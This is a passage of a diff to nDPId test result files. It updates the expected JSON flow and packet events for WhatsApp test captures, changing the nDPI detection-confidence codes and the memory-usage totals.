00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1432820681899,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820681899,"pkt":"ABoRAAACABoRAAABCABFAAA8YBFAAEAG998KCAABnlU6bcI5FGZRO+t+AAAAAKACOQiNYgAAAgQFtAQCCAoABItvAAAAAAEDAwQ="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1432820681901,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820681901,"pkt":"ABoRAAACABoRAAABCABFAAAoAFlAABAGh6yeVTptCggAARRmwjmuxBSBUTvrf1AS\/\/\/2ZgAA"} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1432820681901,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820681901,"pkt":"ABoRAAACABoRAAABCABFAAAoYBJAAEAG9\/IKCAABnlU6bcI5FGZRO+t\/rsQUglAQOQi9XwAA"} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820681899,"flow_last_seen":1432820681935,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820681935,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820681899,"flow_last_seen":1432820681935,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820681935,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820693796,"flow_last_seen":1432820693796,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820693796,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1432820693796,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820693796,"pkt":"ABoRAAACABoRAAABCABFAAA8Y3lAAEAGKR4KCAABnlUFx8lyAbsu9\/NsAAAAAKACOQjjKgAAAgQFtAQCCAoABJAVAAAAAAEDAwQ="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1432820693846,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820693846,"pkt":"ABoRAAACABoRAAABCABFAAAoAHNAABAGvDieVQXHCggAAQG7yXLRCAyTLvfzbVAS\/\/82fwAA"} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1432820693846,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820693846,"pkt":"ABoRAAACABoRAAABCABFAAAoY3pAAEAGKTEKCAABnlUFx8lyAbsu9\/Nt0QgMlFAQOQj9dwAA"} 
-00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820693796,"flow_last_seen":1432820694164,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432820694164,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1432820693796,"flow_last_seen":1432820695137,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":742,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1432820624900,"flow_last_seen":1432820633508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":968,"flow_tot_l4_payload_len":3069,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1432820558921,"flow_last_seen":1432820572412,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":2486,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00701{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1432820633802,"flow_last_seen":1432820681629,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":505,"flow_tot_l4_payload_len":2241,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820568947,"flow_last_seen":1432820628171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.252.121.1","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820569427,"flow_last_seen":1432820629171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"179.60.192.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
-00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820570876,"flow_last_seen":1432820631171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.93.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820570006,"flow_last_seen":1432820630172,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.79.192","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
-00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1432820571488,"flow_last_seen":1432820632171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.73.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820568346,"flow_last_seen":1432820627171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.64.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
-00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820567917,"flow_last_seen":1432820626171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.74.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820567259,"flow_last_seen":1432820625171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
-00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1432820681899,"flow_last_seen":1432820691973,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":254,"flow_tot_l4_payload_len":1783,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820693796,"flow_last_seen":1432820694164,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432820694164,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1432820693796,"flow_last_seen":1432820695137,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":742,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1432820624900,"flow_last_seen":1432820633508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":968,"flow_tot_l4_payload_len":3069,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1432820558921,"flow_last_seen":1432820572412,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":2486,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00701{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1432820633802,"flow_last_seen":1432820681629,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":505,"flow_tot_l4_payload_len":2241,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820568947,"flow_last_seen":1432820628171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.252.121.1","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820569427,"flow_last_seen":1432820629171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"179.60.192.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820570876,"flow_last_seen":1432820631171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.93.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820570006,"flow_last_seen":1432820630172,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.79.192","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1432820571488,"flow_last_seen":1432820632171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.73.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820568346,"flow_last_seen":1432820627171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.64.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820567917,"flow_last_seen":1432820626171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.74.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820567259,"flow_last_seen":1432820625171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1432820681899,"flow_last_seen":1432820691973,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":254,"flow_tot_l4_payload_len":1783,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00582{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","packets-captured":261,"packets-processed":261,"total-skipped-flows":0,"total-l4-payload-len":14389,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":13,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":13,"total-idle-flows":13,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":81,"global_ts_msec":1432820695137} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 261/261 @@ -87,9 +87,9 @@ ~~ total active/idle flows...: 13/13 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5908180 bytes -~~ total memory freed........: 5908180 bytes -~~ total allocations/frees...: 118430/118430 +~~ total memory allocated....: 6041814 bytes +~~ total memory freed........: 6041814 bytes +~~ total allocations/frees...: 121192/121192 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 472 chars ~~ json string max len.......: 711 chars diff --git a/test/results/whatsappfiles.pcap.out b/test/results/whatsappfiles.pcap.out index 258181185..5c734de54 100644 --- a/test/results/whatsappfiles.pcap.out +++ b/test/results/whatsappfiles.pcap.out 
@@ -4,17 +4,17 @@ 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1519924083411,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1519924083411,"pkt":"XEl5dU5qkLkxKPrKCABFAABAAABAAEAG5oDAqAIduTzYNcIKAbs8JoRvAAAAALDC\/\/8eywAAAgQFtAEDAwYBAQgKKOUV+QAAAAAEAgAA"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1519924083501,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1519924083501,"pkt":"kLkxKPrKXEl5dU5qCABFAAA8AABAAFUG0YS5PNg1wKgCHQG7wgonNGFZPCaEcKASbTj4zgAAAgQFggQCCAoJITj5KOUV+QEDAwg="} 